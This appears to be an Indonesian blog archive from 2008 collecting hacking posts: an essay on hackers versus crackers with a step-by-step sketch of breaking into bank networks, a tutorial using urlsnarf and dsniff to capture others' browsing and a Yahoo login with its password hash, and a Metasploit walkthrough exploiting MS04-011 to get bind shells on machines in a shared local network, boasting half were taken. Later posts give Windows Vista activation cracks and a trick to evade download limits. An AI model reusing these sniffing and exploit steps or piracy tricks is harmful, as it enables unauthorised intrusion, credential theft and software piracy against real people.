Akan tetapi, sebagaimana telah dijelaskan, secara umum keahlian keduanya seimbang. Yang membedakan adalah perilaku dan kode etik yang dipegang. Oleh sebab itulah, maka bisa jadi seseorang disebut hacker ketika ia berlagak ala "Robin Hood", akan tetapi dalam kesempatan lain ia melakukan tindakan di luar etika hacker dan merugikan orang lain, maka ia bukan lagi seorang hacker tapi cracker. Dan orang seperti ini banyak di Indonesia, oleh sebab itulah orang kemudian rancu dalam mendefinisikan keduanya, hingga mengganggap keduanya sama.

Menurut seorang yang notabene aktif dalam dunia perhacker-an Bandung mengatakan bahwa hacker adalah satu diantara kehidupan dunia hitam, orang merahasiakan identitas hacker lantaran tidak mungkin menjadi seorang hacker sebelum menggeluti dunia cracker.

Secara fisik, hacker/cracker rata - rata memiliki bodi kurus ceking bak morfinis, matanya cekung ke dalam dan perokok berat. Para hacker dan cracker juga memiliki pengetahuan dan ketelatenan yang lebih dari rata - rata di bidang pemrograman, artinya ia juga seorang programmer. Keahlian di bidang pemrograman ini kebanyakan di dapat secara otodidak, program yang dipelajari pun bukan program pasaran, yakni program yang di download dari Internet. Sekedar referensi, Anda bisa buka situs http://www.astalavista.box.sk. Web ini menawarkan berbagai program hack dan crack yang lumayan komplit.

Bagi pemula menurutnya, seorang hacker sering menggunakan program BO2K, yakni program pembuka password jaringan yang didownload di situs tersebut, meskipun program ini cukup ringan, akan tetapi masih diperhitungkan orang sebagai program yang membahayakan.

Program lainnya adalah "Cain", yakni program pembobol password dan banyak lagi lainnya. Program - program tersebut memiliki listing dan karakter yang tidak terdapat di buku - buku pasaran, tentu untuk menguasainya seorang hacker harus memiliki keuletan yang luar biasa, dan memang begitu kemampuan hacker di pupuk. Mereka mampu bertahan tidak tidur berhari - hari hanya untuk memecahkan atau menyelesaikan programnya, terutama program - program pembobol. Dan bila mentok, mereka akan menghubungi kawan - kawan hacker lain yang dianggap lebih mumpuni melalui IRC atau email.

Bagi hacker/cracker senior, membuat program dan saling tukar-menukar adalah yang biasa mereka lakukan. Tidak jarang mereka saling menguji programnya melalui jarak jauh (jaringan) antar warnet, karena untuk yang satu ini biasanya terjadi antar warnet.

Semua aktifitas komunikasi dunia hacker dilakukan melalui email dan IRC (chatting room). Bila anda membuka #chatroom di IRC, coba masuki channel #Hackerlink, #AntiHackerlink atau #Validator. Di sana anda akan menyaksikan tingkah polah dan teriakan yang sulit di fahami oleh orang yang memang tidak dong di bidang ini. Banyak pesan di blok warna hitam, kuning, hijau atau merah yang bertuliskan peringatan agar sesama hacker menggunakan nickname asli.

Komunikasi antar hacker di IRC tersebut tidak tersekat dalam batas negara atau wilayah tertentu. Hacker dari mana pun tumplek blek di channel tersebut, meski terdapat banyak lagi channel tempat mereka mangkal, tapi di Indonesia, singgahnya yang terkenal ya....di tiga channel itu. Seringnya antar hacker tidak mau tau dimana mereka berada dan dari negara mana dia. Kesamaan hobi dan keahlian ini agaknya telah membentuk kultur dan komunitas sendiri bagi mereka.

Aktifitas cracker yang membobol bank - bank merupakan kejadian yang wajar terjadi dalam dunia hacker. Sistem jaringan Bank, adalah wadah yang cukup menantang bagi seorang hacker untuk menguji kemampuannya. Biasanya Bank itu menempatkan tiga lapisan sekuriti dalam jaringan dan data basenya. Masing - masing sekuriti memiliki tingkatan lagi keamanan yang super ketat.

Benteng pertama adalah pusat, yakni tempat dimana semua data Bank dan proses sirkulasi uang berjalan. Di server ini sekuriti yang dipasang biasanya dilengkapi dengan alarm yang otomatis berbunyi jika ada satu password saja terbongkar tidak melalui jalan yang sebenarnya.

Kedua adalah benteng Operator (benteng terluar) tempat sekuriti dan petugas yang mempublikasikan kepada peng-acces data dan bagian mana yang bisa di akses dan mana yang ditutupi.

Sedang yang ketiga adalah benteng tengah yang menghubungkan antara operator dengan benteng pusat. Benteng tengah ini selain menghubungkan ke server pusat, juga menghubungkan ke server skunder, yakni tempat penyimpanan cadangan yang siap memback up server pusat apa bila tiba - tiba terjadi kerusakan. Jadi ketika server pusat tiba - tiba rusak, secara otomatis benteng tengah mengalirkan pusat operasi perbankannya ke server skunder (back up) tersebut.

Alur ini harus dipahami oleh seorang hacker, dan seorang hacker juga harus paham bahwa setiap tingkat/benteng tersebut terdapat banyak sekuriti (pintu keamanan) tapi terkunci, nah dari sinilah ibaratnya maling, membongkar lubang rumah yang mana yang paling aman agar tidak diketahui oleh pemilik rumah. Yakni membobol satu atau dua password yang paling aman agar tidak diketahui oleh operator, setelah pintu pertama dapat disusupi, seorang hacker menuju ke benteng tengah, yakni benteng penghubung antar operator dan server pusat. Sebagaimana benteng pertama, benteng ini juga dilengkapi dengan sekuriti yang tidak sedikit, oleh sebab itu seorang hacker juga harus pandai memilah pintu mana yang bila dibobol tidak terdengar oleh pemiliknya. Dan setelah pintu ini berhasil dibuka, seorang hacker tinggal menyelesaikan tugas akhirnya, yakni memasuki benteng pusat. Seperti yang telah digambarkan, benteng ini berisi server letak data dan sirkulasi perbankan disimpan. Tentu sekuriti yang dipasang juga lebih kuat dan kokoh, tidak banyak hacker yang mampu melintasi pintu ini, sebab aksesoris keamanan dilengkapi banyak jebakan dan alarm.

Hacker kebanyakan gagal melintasi pintu ini, bila gagal, ia tidak berhenti sampai di situ, seorang hacker akan memperbaiki programnya atau meminta bantuan kawan hacker lainnya guna menyelesaikan kasus tersebut sampai benar - benar mampu membongkar jantung Bank tersebut.

Akan tetapi bila berhasil, banyak hal yang dapat hacker lakukan, yang sering dilakukan adalah mengakses data - data milik Bank tersebut kemudian disalahgunakan atau di jual pada para carder. Bila tega, mereka tidak segan - segan mengubah data dalam server dan bahkan menghapusnya.

Motif seorang hacker tidak lain hanyalah demi uang atau mencari keuntungan. Meski tidak semuanya salah, akan tetapi bisa dipastikan orang Indonesia yang utak - utik dunia per-hacker-an kepentingannya tidak jauh dari mencuri (berbuat curang). Seperti yang telah digambarkan, bahwa sesungguhnya hacker itu bergerak bak pahlawan "Robin Hood", lantas apa benar ada sosok hacker yang betul - betul berperan sebagaimana idealnya pahlawan tersebut ?

Satu tahun terakhir ini domain Indonesia mendapatkan tamu yang membobol beberapa erver domain yang menggunakan nama Stollen. Memang Stollen menunjukkan sebagaimana hacker yang dipahami sebenarnya. Artinya, ia mengaku tidak memiliki kepentingan apapun terhadap situs (domain) yang ia bajak, ia hanya ingin menunjukkan bahwa terdapat beberapa hole dalam prosedur pendaftaran domain yang dilakukan oleh NetSol. Lebih dari itu, ternyata Stollen juga menemukan bahwa beberapa admin domain (Indonesia) tidak memiliki cukup pengetahuan untuk melindungi domain - domain mereka. Terbukti, dari 15 domain (Indonesia) yang dibajak Stollen, tidak satupun pemiliknya mencoba segera mengambil kembali domain tersebut. Respon tercepat yang didapatkan adalah setelah 2 hari. Bayangkan, 2 hari sesudah pembajakan !! Akan tetapi, dibiarkan pemiliknya mengambil kembali. Seperti yang telah diungkapkan sebelumnya, Stollen tidak memiliki kepentingan tersembunyi apapun. Jika pemiliknya dapat mengambil kembali, silahkan saja. Jika mereka mampu. By the way, salah satu pemilik domain, kalau tidak salah plasa.com yang pemiliknya menggunakan email dns@commerce.net.id, sebenarnya "meminta dengan amat sangat" kepada Stollen untuk mengembalikan domain mereka....

Stollen juga mengatakan bahwa semua ini dilakukan sekaligus memberi peringatan kepada admin (Indonesia) agar tidak menyepelekan persoalan sekuriti (keamanan) dalam menjaga domain mereka, dan kini beberapa admin sudah menempatkan path-nya dengan baik.

Profil Stollen yang ia mainkan tersebut memang pantas apabila dianggap sebagai hacker, sebab ia tidak melakukan pengrusakan - pengrusakan, akan tetapi ia menunjukkan kepada pemilik domain (admin) bahwa mereka lupa memperhatikan sekuriti server mereka. Stollen juga menunjukkan adanya beberapa hole pada prosedur pendaftaran NetSol, berarti semua ini bukan kesalahan InterNIC. Sedang contoh cracker yang digambarkan penjahat bisa anda saksikan seperti Kevin Mitnic dan Wenas.

Sampai kapankah pertempuran peran Hacker dan Cracker ini akan berlangsung. Apakah menunggu hadirnya pahlawan baru, yakni UU Cyber Crime (cyber law) dengan Cyber Police sebagai penegaknya dan mungkin Cyber Jail tempat hukumannya. Atau ini akan berjalan seiring zaman dan kesadaran manusia secara alamiah....we can only "Wait and See"

hack linuk

2008-06-07T04:15:00.001-07:00

Untuk hacking linux maka anda dapat masuk

http://familycode.atspace.com/ilmuilmu.htm
http://familycode.atspace.com/downloadsource.htm
http://familycode.atspace.com/downloadlinux.htm
http://familycode.atspace.com/hackertools.htm

Untuk mendapatkan informasi lebih banyak anda dapat masuk di Website Yogya Family Code

Grabbing URL, Sniffing, dan Remote Exploit

2008-06-07T04:14:00.001-07:00

Auditor security merupakan sebuah system operasi yang bersifat live-system berbasiskan pada knopix.

Menurut penciptanya yang dituliskan pada http://remote-exploit.org , linux Auditor Security diciptakan untuk
memenuhi kebutuhan para excellent-user yang dikombinasikan dengan toolset yang optimal serta penggunakan
yang user friendly. Program – program open source pada auditor security menawarkan toolset yang komplit
untuk meng-analysis keamanan sebuah system, byte per byte.

Dalam tulisan ini akan dibahas sebagian dari security tool set yang terdapat pada linux Auditor Security.

A. Grabbing URL
Yang dimaksusd grabbing URL adalah mendapatkan alamat URL yang dikunjungi oleh seseorang tanpa ataupun sepengetahuan
dari orang tersebut. Di bawah akan dibahas mengenai grabbing URL pada suatu channel IRC dan pada jaringan lokal yang
terhubung dengan internet.

1. Grabbing URL pada channel IRC
Untuk melakukan grabbing URL pada channel IRC bisa dilakukan dengan menggunkan XCHAT yang telah tersedia secara bult-in
pada linux auditor. Langkah pertama tentu saja kita harus join ke channel tertentu. Setelah join ke channel tertentu
langkah selanjutnya klik tab Windows kemudian pilih URL Grabber. Tunggu beberapa saat, maka jika ada salah satu user yang
tergabung pada channel tersebut membuka sebuah URL, list dari URL Grabber akan bertambah.
Berikut ini hasil grabbing URL yang penulis lakukan pada channel : #hnet, #skb50, #indonona, #echo, #k-elektronik, #bandung
pada server dalnet tanggal 1 September 2005.

ftp.orghttp://echo.or.id
http://irc.jraxis.com/dalnet/default/
http://kline.dal.net/exploits/akills.htm#ma
http://kline.dal.net/exploits/akills.htm#ma)))
http://kline.dal.net/massads/mup.htm
http://kline.dal.net/proxy/
http://miranda-im.org
http://tiongkokmusic.com:2222/listen.pls
http://unut.hollosite.com
http://valueshells.com
http://valueshells.com/disc.html
http://www.dal.net/
http://www.dal.net/aup/
http://www.equinix.net
http://www.kecoak.or.id
http://www.malanghack.net/
http://www.rayofshadow.or.id
http://www.valueshells.com
irc.hackerszone.orgirc.vsnl.com
www.balihack.or.idwww.bandung-dal.net
WwW.BaNdUnG.tKwww.dal.net/proxies
www.jraxis.comwww.malanghack.net
WwW.PsYcHoPeD.InFowww.scoopsite.com
www.superask.netwww.VALUESHELLS.com
www.ValueShells.comwww.valueshells.com
www.valueshells.comwww.w0nk.org
www.zone-h.org/en/defacements/mirror/id=2840693/>
www.zone-h.org/en/defacements/mirror/id=2840696/>

Daftar URL diatas merupakan daftar dari URL-URL yang dikunjungi para chatter pada channel – channel diatas.
Kelemahan dari XCHAT yaitu XCHAT belum mampu secara spesifik mengetahui URL yang dikunjungi tiap chatter.

2. Grabbing URL Pada Jaringan Lokal Yang Terhubung Pada Internet

Selain grabbing URL pada suatu channel IRC kita juga bisa melakukan grabbing URL pada jaringan lokal yang terhubung
pada internet. Untuk melakukanya kita bisa menggunakan URL Snarf. Untuk menjalankan URL Snarf ketikan perintah berikut
pada konsole :

hyraxz@chidori~dove# urlsnarf -i eth0 > ./grabMeBabe.txt

Setelah URL Snarf berhasil dijalankan maka tugas kita selanjutnya adalah tinggal tidur dan membuka hasil grabbing
keesokan hari.Berikut ini satu baris potongan dari hasil grabbing URL yang berhasil penulis capture, penulis hanya
menunjukan 1 baris dari 994 baris hasil grabbing yang didapat mulai dari jam 00:15:37 sampai 06:21:10 pada
tanggal 02/Sep/2005.

192.168.10.5 - - [02/Sep/2005:05:38:37 -0400] "GET http://www.friendster.com/friendrequests.php?lastact=approve&sc=933
HTTP/1.1" - - "http://www.friendster.com/friendrequests.php?statpos=homealerts" "Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)"

Dari hasil grabbing tersebut maka kita bisa mengambil suatu analisa bahwa komputer dengan IP 192.168.10.5
pada [02/Sep/2005:05:38:37 -0400] dengan menggunakan methode GET sedang mengakses www.friendster.com dan kemungkinan
besar user tersebut sedang meng-approve friend request. Sangat dimungkinkan browser dari user tersebut adalah
Mozzila/5.0 dengan mamakai sistem operasi linux.

B. Sniffing Menggunakan DSNIFF

Sniffing merupakan usaha yang dilakukan untuk memperoleh suatu informasi tertentu dalam suatu network dangan jalan
meng-capture paket – paket data yang ada pada suatu network dan kemudian menganalisinya untuk diambil informasinya
yang dianggap penting. Dsiniff merupakan suatu tool sniffing yang telah tersedia pada linux auditor security.
Untuk memulai sniffing ketikan perintah berikut ini:

hyraxz@chidori~dove# dsniff –i eth0 –W /mnt/hda5/passwd_HhAN.db

perintah diatas akan memerintahkan dsniff untuk meng-capture paket - paket yang melintasi eth0 dan menuliskan hasilnya
pada sebuah file dengan nama passwd_HhAN.db yang disimpan pada directory /mnt/hda5/.
Untuk membaca hasilnya gunakan perintah berikut ini:

hyraxz@chidori~ dove# dsniff -r /mnt/hda5/passwd_HhAN.db

Atau kalau kita ingin merubahnya dalam format ASCII sehingga file tersebut bisa dibuka menggunakan notepad saat di Windows,
ketik perintah berikut :

hyraxz@chidori~dove# dsniff -r /mnt/hda5/passwd_HhAN.db > /mnt/hda5/GetDownEnemy.txt

Berikut ini merupakan file ASCII hasil dari sniffing yang berhasil penulis documentasikan :

09/02/05 04:58:42 tcp 192.168.10.7.1183 -> p2.rd.scd.yahoo.com.80 (http)GET
/reg/login1/newym_nouc/lisu/login/us/ym/*http://login.yahoo.com/config/login?.tries=1&.src=ym&.md5=&.hash=&.js=1&.
last=&promo=&.intl=us&.bypass=&.partner=&.u=b261flt1heuai&.v=0&.challenge=Ymjr9vf35ZRMTV9YkEFy0vhTsQz0&.yplus=&.
emailCode=&pkg=&stepid=&.ev=&hasMsgr=1&.chkP=Y&.done=http%3A//mail.yahoo.com&login=rip_zombie
&passwd=ace61b359fa543aceccf111dbd767e74&.persistent=&.hash=1&.md5=1 HTTP/1.1Host: us.rd.yahoo.com

Berikut analysis dari hasil sniffing di atas:
1. Sniffing dilakukan pada tgl 02 September 2005 jam 04:58:42. Sniffing dilakukan pada koneksi TCP antara host dengan
IP 192.168.10.7:1183 dengan server yahoo pada p2.rd.scd.yahoo.com:80 denagan memakai protokol HTTP.
2. User Name untuk login ke server e-mail dari user tersebut adalah rip_zombie dengan password hasil enkripsi
MD5 “ace61b359fa543aceccf111dbd767e74” (tanpa tanda petik).
3. Server mail yahoo menggunakan methode enkripsi MD5.

C. Remote Exploit

Remote exploit adalah suatu program yang dijalankan pada computer attacker, digunakan untuk menginjeksi komputer target
sehingga attacker memperoleh hak akses lebih dari yang diijinkan tanpa ataupun sepengetahuan dari korban.
Linux Auditor Security menyediakan tool tersebut dengan nama Metasploit.
Menyusup di Jaringan SKB50 Menggunakan Metasploit
Sebelum memulainya tentu saja komputer attaccker harus di set IP-nya sesuai dengan IP dari jaringan SKB50. berikut ini
konfigurasi IP dari komputer attacker yang telah disesuaikan dengan konfigurasi IP pada jaringan SKB50.

hyraxz@chidori~dove# ifconfig –eth0 192.168.0.10 netmask 255.255.255.0
hyraxz@chidori~dove# ifconfig
eth0 Link encap:Ethernet HWaddr 00:E0:18:F3:9A:D0
inet addr:192.168.0.10 Bcast:192.168.0.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:712 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:69398 (67.7 KiB) TX bytes:595 (595.0 b)
Interrupt:5 Base address:0x9800
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:10 errors:0 dropped:0 overruns:0 frame:0
TX packets:10 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:500 (500.0 b) TX bytes:500 (500.0 b)

Selanjutnya ketikan perintah dibawah ini untuk memanggil console metasploit :

hyraxz@chidori~dove# cd /opt/auditor/metasploit
hyraxz@chidori~dove# ./msfconsole

jika berhasil maka akan muncul tulisan seperti berikut ini :

888 888 d8b888
888 888 Y8P888
888 888 888
88888b.d88b. .d88b. 888888 8888b. .d8888b 88888b. 888 .d88b. 888888888
888 "888 "88bd8P Y8b888 "88b88K 888 "88b888d88""88b888888
888 888 88888888888888 .d888888"Y8888b.888 888888888 888888888
888 888 888Y8b. Y88b. 888 888 X88888 d88P888Y88..88P888Y88b.
888 888 888 "Y8888 "Y888"Y888888 88888P'88888P" 888 "Y88P" 888 "Y888
888
888
888
+ -- --=[ msfconsole v2.4 [75 exploits - 75 payloads]
msf >

untuk memulai penggunakanya ketikan perintah-perintah dibawah ini:

msf > show exploits
Metasploit Framework Loaded Exploits
====================================
3com_3cdaemon_ftp_overflow 3Com 3CDaemon FTP Server Overflow
Credits

afp_loginext
aim_goaway

apache_chunked_win32
arkeia_agent_access

arkeia_type77_macos
arkeia_type77_win32

backupexec_ns
bakbone_netvault_heap

blackice_pam_icq
cabrightstor_disco

cabrightstor_disco_servicepc
cabrightstor_uniagent

calicclnt_getconfig
calicserv_getconfig

distcc_exec
exchange2000_xexch50

globalscapeftp_user_input
ia_webmail

icecast_header
iis40_htr

iis50_printer_overflow
iis50_webdav_ntdll

iis_fp30reg_chunked
iis_nsiislog_post

iis_source_dumper
iis_w3who_overflow

imail_imap_delete
imail_ldap

irix_lpsched_exec
lsass_ms04_011

maxdb_webdbm_get_overflow
mercantec_softcart

minishare_get_overflow
msasn1_ms04_007_killbill

msmq_deleteobject_ms05_017
msrpc_dcom_ms03_026

mssql2000_preauthentication
mssql2000_resolution

netterm_netftpd_user_overflow
openview_omniback

oracle9i_xdb_ftp
oracle9i_xdb_ftp_pass

payload_handler
poptop_negative_read

realserver_describe_linux
samba_nttrans

samba_trans2open
samba_trans2open_osx

samba_trans2open_solsparc
sambar6_search_results

seattlelab_mail_55
sentinel_lm7_overflow

servu_mdtm_overflow
smb_sniffer

solaris_dtspcd_noir
solaris_kcms_readfile

solaris_lpd_exec
solaris_sadmind_exec

solaris_snmpxdmid
solaris_ttyprompt

squid_ntlm_authenticate
svnserve_date

trackercam_phparg_overflow
uow_imap4_copy

uow_imap4_lsub
ut2004_secure_linux

ut2004_secure_win32
warftpd_165_pass

warftpd_165_user
webstar_ftp_user

windows_ssl_pct
wins_ms04_045

wsftp_server_503_mkd
Metasploit Framework Credits

AppleFileServer LoginExt PathName Overflow
AOL Instant Messenger goaway Overflow

Apache Win32 Chunked Encoding
Arkeia Backup Client Remote Access

Arkeia Backup Client Type 77 Overflow (Mac OS X)
Arkeia Backup Client Type 77 Overflow (Win32)

Veritas Backup Exec Name Service Overflow
BakBone NetVault Remote Heap Overflow

ISS PAM.dll ICQ Parser Buffer Overflow
CA BrightStor Discovery Service Overflow

CA BrightStor Discovery Service SERVICEPC Overflo
CA BrightStor Universal Agent Overflow

CA License Client GETCONFIG Overflow
CA License Server GETCONFIG Overflow

DistCC Daemon Command Execution
Exchange 2000 MS03-46 Heap Overflow

GlobalSCAPE Secure FTP Server user input overflow
IA WebMail 3.x Buffer Overflow

Icecast (<= 2.0.1) Header Overwrite (win32)
IIS 4.0 .HTR Buffer Overflow

IIS 5.0 Printer Buffer Overflow
IIS 5.0 WebDAV ntdll.dll Overflow

IIS FrontPage fp30reg.dll Chunked Overflow
IIS nsiislog.dll ISAPI POST Overflow

IIS Web Application Source Code Disclosure
IIS w3who.dll ISAPI Overflow

IMail IMAP4D Delete Overflow
IMail LDAP Service Buffer Overflow

Irix lpsched Command Execution
Microsoft LSASS MSO4-011 Overflow

MaxDB WebDBM GET Buffer Overflow
Mercantec SoftCart CGI Overflow

Minishare 1.41 Buffer Overflow
Microsoft ASN.1 Library Bitstring Heap Overflow

Microsoft Message Queueing Service MSO5-017
Microsoft RPC DCOM MSO3-026

MSSQL 2000/MSDE Hello Buffer Overflow
MSSQL 2000/MSDE Resolution Overflow

NetTerm NetFTPD USER Buffer Overflow
HP OpenView Omniback II Command Execution

Oracle 9i XDB FTP UNLOCK Overflow (win32)
Oracle 9i XDB FTP PASS Overflow (win32)

Metasploit Framework Payload Handler
Poptop Negative Read Overflow

RealServer Describe Buffer Overflow
Samba Fragment Reassembly Overflow

Samba trans2open Overflow
Samba trans2open Overflow (Mac OS X)

Samba trans2open Overflow (Solaris SPARC)
Sambar 6 Search Results Buffer Overflow

Seattle Lab Mail 5.5 POP3 Buffer Overflow
SentinelLM UDP Buffer Overflow

Serv-U FTPD MDTM Overflow
SMB Password Capture Service

Solaris dtspcd Heap Overflow
Solaris KCMS Arbitary File Read

Solaris LPD Command Execution
Solaris sadmind Command Execution

Solaris snmpXdmid AddComponent Overflow
Solaris in.telnetd TTYPROMPT Buffer Overflow

Squid NTLM Authenticate Overflow
Subversion Date Svnserve

TrackerCam PHP Argument Buffer Overflow
University of Washington IMAP4 COPY Overflow

University of Washington IMAP4 LSUB Overflow
Unreal Tournament 2004 "secure" Overflow (Linux)

Unreal Tournament 2004 "secure" Overflow (Win32)
War-FTPD 1.65 PASS Overflow

War-FTPD 1.65 USER Overflow
WebSTAR FTP Server USER Overflow

Microsoft SSL PCT MS04-011 Overflow
Microsoft WINS MS04-045 Code Execution

WS-FTP Server 5.03 MKD Overflow

msf > use lsass_ms04_011
msf lsass_ms04_011 > show payloads
Metasploit Framework Usable Payloads
====================================
win32_adduser

win32_bind
win32_bind_dllinject

win32_bind_meterpreter
win32_bind_stg

win32_bind_stg_upexec
win32_bind_vncinject

win32_exec
win32_passivex

win32_passivex_meterpreter
win32_passivex_stg

win32_passivex_vncinject
win32_reverse

win32_reverse_dllinject
win32_reverse_meterpreter

win32_reverse_ord
win32_reverse_ord_vncinject

win32_reverse_stg
win32_reverse_stg_upexec

win32_reverse_vncinject
Windows Execute net user /ADD

Windows Bind Shell
Windows Bind DLL Inject

Windows Bind Meterpreter DLL Inject
Windows Staged Bind Shell

Windows Staged Bind Upload/Execute
Windows Bind VNC Server DLL Inject

Windows Execute Command
Windows PassiveX ActiveX Injection Payload

Windows PassiveX ActiveX Inject Meterpreter Payload
Windows Staged PassiveX Shell

Windows PassiveX ActiveX Inject VNC Server Payload
Windows Reverse Shell

Windows Reverse DLL Inject
Windows Reverse Meterpreter DLL Inject

Windows Staged Reverse Ordinal Shell
Windows Reverse Ordinal VNC Server Inject

Windows Staged Reverse Shell
Windows Staged Reverse Upload/Execute

Windows Reverse VNC Server Inject

msf lsass_ms04_011 > set PAYLOAD win32_bind
PAYLOAD -> win32_bind
msf lsass_ms04_011(win32_bind) > set RHOST 192.168.0.27
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > show options
Exploit and Payload Options
===========================
Exploit: Name Default Description
-------- ------ ------------ ------------------
required RHOST 192.168.0.19 The target address
required RPORT 139 The target port
Payload: Name Default Description
-------- -------- ------- ------------------------------------------
required EXITFUNC thread Exit technique: "process", "thread", "seh"
required LPORT 4444 Listening port for bind shell
Target: Automatic
msf lsass_ms04_011(win32_bind) > exploit
RHOST -> 192.168.0.27
msf lsass_ms04_011(win32_bind) > exploit
[*] Starting Bind Handler.
[*] Detected a Windows XP target (KICKS)
[*] Windows XP may require two attempts
[*] Sending 8 DCE request fragments...
[*] Sending the final DCE fragment
[*] Got connection from 192.168.0.10:1382 <-> 192.168.0.27:4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32> netstat -a
netstat -a
Active Connections
Protocol Local Address Foreign Address State
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
TCP

TCP
UDP

UDP
UDP

UDP
UDP

UDP
UDP

UDP
kicks:epmap

kicks:microsoft-ds
kicks:1025

kicks:1056
kicks:1090

kicks:1095
kicks:1098

kicks:1130
kicks:4444

kicks:5000
kicks:netbios-ssn

kicks:1162
kicks:1169

kicks:4444
kicks:microsoft-ds

kicks:isakmp
kicks:ntp

kicks:1900
kicks:ntp

kicks:netbios-ns
kicks:netbios-dgm

kicks:1900
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

0.0.0.0:0
0.0.0.0:0

192.168.0.10:1382
*:*

*:*
*:*

*:*
*:*

*:*
*:*

*:*
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

LISTENING
LISTENING

ESTABLISHED

^c
Caught interrupt, exit connection? [y/n]y
msf lsass_ms04_011(win32_bind) >

Analisa dari hasil aktivitas diatas adalah sebagai berikut :
metasploit meng-attack korban melalui port 139 kemudian memasukan payload yang akan membangun hubungan antara korban
dengan attacker dengan menggunakan mode koneksi TCP, dimana hubungan dilakukan melalui port 4444 pada sisi korban
dan port 1382 pada sisi attacker.Setelah bind port antara attacker dengan korban terbentuk maka attacker menguasai
sepenuhnya aktifitas dari komputer korban. Dari 12 komputer yang hidup saat analisa dilakukan pada jaringan lokal
SKB50 6 buah komputer mampu di tembus dengan menggunakan metasploit, ini berarti bahwa 50% jaringan SKB50 pada saat
itu ada di tangan attacker ;).

Daftar Pustaka :
Fwerd (Kecoak Elektronik), Memanen Password Di Jaringan Lokal dengan dsniff,
Terbitan Online Kecoak Elektronik http://k-elektronik.co.id.
From Exploit, http://new.remote-exploit.org/index.php/Auditor_main.

Get a new IP

2008-06-07T04:13:00.000-07:00

Get a new IP Address even if you have a Static IP
Yes, it is possible. Try it, it works for a lot of people, even people with cable modems.

1. Open up the command prompt by pressing Start->Run and typing in cmd

2. In the command prompt, type "Ipconfig/all". This will tell you your current IP Address. After, type "ipconfig/release". Keep the command prompt open for easy access.

3. Go to "Network Connections" (accessible through the control panel). Right click "Local Area Connection" and click "Properties"

4. With "Internet Protocol (TCP/IP) selected, click the "Properties" button.

5. A new window will open. Under the "General" tab, select "Use the Following IP address". Under "Ip Address", put "10.0.0.1". Press the "Tab" key on your keyboard.

6. Press Ok on both open windows.

7. Repeat steps 3-4. Under the "General" tab, press the radio button "Automatically Assign Me an Ip Address". Press ok on both windows.

8. Go back to the command prompt and type in "Ipconfig/all". You'll now notice you have a new IP address.

VOILA! Hello unlimited Rapidshare downloads. +1 for the warez community.

Filtering Incoming Port & IP pada XP

2008-06-07T04:12:00.001-07:00

Pada Win Xp (gka tau Win Lainnya soalnya gak pernah nyoba ..) ada fasilitas Filter IP dan port yang masuk ke kompi .. So buat yg tau ..mungkin bisa nambahin penjelasan nanti ..Then , Kompi kitaakan lebih aman klo port2 tetrtentu ato mungkin ip tertentu telah kita filter (alias di blok) caranya klik kanan pada symbol koneksi (ato buka LAN propertiesnya ) trus pada dialog box Local Area Connecttion diListbox pilih Internet Protocol TCP /IP nya then klik properties --> advance -->trus cari Tab "Option " pada list box pilih "TCP/IP Filtering " kemudian klik properties di sudut list box nya , Nah nanti akan muncul kotak dialog TCP/IP filtering .. untuk menaktifkan TCP/IP Filetering Klik cekbox "Enable TCP/IP fil.." di katifkan, kemudian disana ada tiga listbox yg masing -masing untuk untuk filter port TXP, Port UDP dan Filter IP .. < SIlahkan nada mencoba2 nya .. ...Bagi ANda yg lebih tahu ..mungkin bisa menambahkan informasinya ...

Thnk .. Moga2 bermanfaat

memaksimalkan kinerja firefox

2008-06-07T04:11:00.000-07:00

*
Klik tombol Vista Start dan ketikkan “Cmd” pada kotak Start Search.
*
Tekan Ctrl-Shift-Enter untuk membuka Command Prompt sebagai pengguna dengan hak administrator.
*
Pada Command Prompt, ketikkan perintah “slmgr -rearm” dan tekan [Enter].
*
Restart komputer.
*
Cara ini digunakan untuk memperbaharui masa 30 harinya, jadi ulangi langkah di atas ketika masa aktivasi habis.

beberapa hari yang lalu, saya baru beli windows vista final build 6000 bajakan sih. nah ternyata proses aktivasinya cukup mudah, aku baca di internet ini cara katanya sih yang buat Dr. Chang. jadi begini cara singkatnya :

1. install windows vista final dengan cd key yg didapet
2. bikin product rc1/rc2 key disini kita cuma butuh sebuah email untuk dapetin key ini
3. replace 2 file pkeyconfig.xrm-ms dan tokens.dat dari package Dr. Chang
4. restart windows
5. anda akan diminta untuk memasukkan lagi product key, gunakan dari no 2.
6. jalankan run(windows+r) dan ketik “slui”, makan anda akan melakukan aktivasi lewat internet
7. selesai, windows anda sudah menjadi original(microsoft genuine), coba cek dengan jalanin “slmgr.vbs -xpr” di run, akan tertulis permanent activated

yah beginiliah setiap sistem keamanan yang dibuat manusia pasti ga ada yang permanen. sebenernya tricknya sederhana, anda dapat melakukan aktivasi dengan sukses, sebab microsoft mengira os yang anda pasang masih beta/rc1/rc2(akibat no 3) dan dengan no 2 itu anda berhasil melakukan aktivasi.

Trik untuk mempercepat Firefox
1. Pada bar alamat, ketik = about:config
2. scroll kebawah
Code:
---> network.http.pipelining
---> network.http.proxy.pipelining
---> network.http.pipelining.maxrequests

3. Lakukan perubahan dengan mengklik 2 kali, ubah nilainya
1. Ubah nilai network.http.pipelining menjadi " true "
2. Ubah nilai network.http.proxy.pipelining menjadi " true "
3. Ubah nilai network.http.pipelining.maxrequests menjadi, misal 10, 20, atau lebih. Tetapi disarankan dibawah lima.

4. Langkah terakhir
Klik kanan sembarang tempat, pilih New --> Integer
berikan nama " nglayout.initialpaint.delay "
